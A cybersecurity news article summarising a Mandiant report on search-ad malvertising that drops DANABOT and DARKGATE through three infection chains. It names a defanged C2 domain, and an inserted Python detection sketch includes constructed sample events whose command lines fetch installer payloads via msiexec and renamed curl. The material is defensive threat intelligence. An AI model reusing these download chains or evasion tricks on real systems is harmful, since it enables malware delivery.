Cyber Security News

Hackers Abusing Search Engine Ads to Deliver DANABOT & DARKGATE Malware

Threat actors are purchasing advertisements for malicious websites to lure victims into downloading malware, which can eventually lead to data theft and ransomware. 

This technique has been used across several ad platforms, including search engine ads and social media ads, because those platforms offer fine-grained targeting controls such as specific audiences, geographic locations, IP address ranges, browsing history, and device types.

Search Engine Ads Deliver Malware

According to the reports shared with Cyber Security News, four different malware families were observed during the investigation of these malicious ad campaigns:

  • PAPERDROP – VBScript-based downloader that communicates over HTTPS and downloads and executes DANABOT.
  • PAPERTEAR – VBScript-based downloader observed to enumerate the list of local processes.
  • DANABOT – Backdoor written in Delphi that uses a custom binary protocol over TCP.
  • DARKGATE – Backdoor written in Delphi that is capable of capturing keystrokes, executing commands, transferring files, and stealing credentials.

In addition, three different delivery chains were observed, two of which used a renamed version of the cURL binary.

Infection Chain #1: PAPERDROP > DANABOT

In this infection chain, the wscript.exe process initiates a DNS request and then launches the Windows Installer utility msiexec.exe, which installs an application. The installed component then uses rundll32.exe to load the dropper DLL and calls its exported “start” function to launch the DANABOT payload.

Infection Chain #1 (Source: Mandiant)

Infection Chain #2: PAPERTEAR > RENAMED CURL > DARKGATE

In this second infection chain, the PAPERTEAR downloader initiates an HTTP POST request to infocatalog[.]pics over port 8080. After this, wscript.exe executes a one-liner command that eventually drops the DARKGATE malware onto the victim’s system.

Infection Chain #2 (Source: Mandiant)

Infection Chain #3: PAPERDROP > RENAMED CURL > DANABOT

The third execution chain is similar to the second one, but here the PAPERDROP downloader executes another extended one-liner that uses the renamed curl.exe binary to download and install a malicious package file, which drops the DANABOT malware.
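As an added example (not from the article or from Mandiant's report), the following Python sketch turns the process-creation patterns of the three chains above into detection logic and runs it over constructed Sysmon-style events; the field names, sample paths and .invalid hostnames are assumptions, not indicators from the report.

```python
from dataclasses import dataclass

@dataclass
class ProcEvent:
    """Process-creation event; fields loosely follow Sysmon Event ID 1 (assumed names)."""
    parent: str          # ParentImage basename
    image: str           # Image basename
    cmdline: str         # CommandLine
    original_name: str   # OriginalFileName from the PE version resource

def rundll32_export(cmd: str) -> str:
    """Extract the export name from 'rundll32.exe <dll>,<Export> [args]' (comma or space)."""
    _, sep, rest = cmd.partition(".dll")
    if not sep:
        return ""
    rest = rest.lstrip(' ,"')
    return rest.split(" ", 1)[0].lower() if rest else ""

def classify(ev: ProcEvent) -> list[str]:
    """Return the chain indicators an event matches (empty list if none)."""
    parent, image = ev.parent.lower(), ev.image.lower()
    cmd, orig = ev.cmdline.lower(), ev.original_name.lower()
    hits = []
    # Chain #1: the script host launching the Windows Installer
    if parent == "wscript.exe" and image == "msiexec.exe":
        hits.append("chain1:wscript_spawns_msiexec")
    # Chain #1: rundll32 loading the dropper DLL and calling its 'start' export
    if image == "rundll32.exe" and rundll32_export(cmd) == "start":
        hits.append("chain1:rundll32_start_export")
    # Chains #2/#3: the script host running a one-liner that fetches over HTTP
    if parent == "wscript.exe" and image == "cmd.exe" and "http" in cmd:
        hits.append("chain2_3:wscript_oneliner_download")
    # Chains #2/#3: cURL renamed on disk; the PE's OriginalFileName still says curl.exe
    if orig == "curl.exe" and image != "curl.exe":
        hits.append("chain2_3:renamed_curl")
    return hits

def scan(events: list[ProcEvent]) -> list[tuple[int, list[str]]]:
    return [(i, h) for i, ev in enumerate(events) if (h := classify(ev))]

# Constructed sample telemetry (no real hosts or URLs; .invalid is a reserved TLD)
SAMPLE_EVENTS = [
    ProcEvent("wscript.exe", "msiexec.exe", "msiexec.exe /i https://pkg.example.invalid/a.msi /qn", "msiexec.exe"),
    ProcEvent("msiexec.exe", "rundll32.exe", 'rundll32.exe "C:\\ProgramData\\app\\drop.dll",start', "RUNDLL32.EXE"),
    ProcEvent("wscript.exe", "cmd.exe", "cmd.exe /c update.exe -o a.msi http://dl.example.invalid:8080/p", "Cmd.Exe"),
    ProcEvent("cmd.exe", "update.exe", "update.exe -o a.msi http://dl.example.invalid:8080/p", "curl.exe"),
    ProcEvent("explorer.exe", "curl.exe", "curl.exe https://example.invalid/", "curl.exe"),  # benign
]
```

The last sample shows the renamed-cURL rule staying quiet for a legitimately named curl.exe, which is the false-positive case a hunt query on this chain has to get right.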

Infection Chain #3 (Source: Mandiant)

Furthermore, a complete report has been published which provides detailed information about the malware capabilities, execution methods, chains, and other information.

Indicators of Compromise

Source: Mandiant
Eswar

Eswar is a cybersecurity reporter with a passion for creating captivating and informative content. With years of experience in cybersecurity, he reports on data breaches, privacy, and APT threats.
